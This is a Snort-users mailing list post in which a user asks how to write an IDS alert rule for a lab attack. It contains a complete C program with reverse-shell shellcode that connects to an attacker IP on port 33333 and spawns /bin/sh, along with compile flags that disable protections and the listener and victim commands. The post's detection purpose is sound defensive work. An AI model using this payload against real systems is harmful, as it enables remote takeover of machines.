Snort mailing list archives
Write rule alert shellcode
From: nguyen cao via Snort-users <snort-users () lists snort org>
Date: Tue, 24 Oct 2017 07:33:09 -0700
I use shellcode: #include <stdio.h> #include <string.h> char code[] = \ "\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0" "\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" "\xc0\xa8\x01\x85" // <— change ip address of attacker "\x66\x68" "\x82\x35" // <— port 33333 "\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; int main(int argc,char **argv) { int(*func)(); func=(int(*)())code; (int)(*func)(); } command run : gcc namefile.c -o namefile -fno-stack-protector -z execstack When running the command above I was shellcode. Attacker and victim are use kali linux. - attacker run command : " nv -lvp 33333 " - victim run command : " ./namefile " ( run file shellcode ) When the victim runs the command. The attacker opens the connection to the victim I tried several ways but could not write rule alert for this type of attack! Hope everybody help please
_______________________________________________ Snort-users mailing list Snort-users () lists snort org Go to this URL to change user options or unsubscribe: https://lists.snort.org/mailman/listinfo/snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news!
Current thread:
- Write rule alert shellcode nguyen cao via Snort-users (Oct 24)
- Re: Write rule alert shellcode Joel Esler (jesler) via Snort-users (Oct 24)
- Message not available
- Message not available
- Re: Write rule alert shellcode nguyen cao via Snort-users (Oct 24)
- Message not available
- Re: Write rule alert shellcode Joel Esler (jesler) via Snort-users (Oct 24)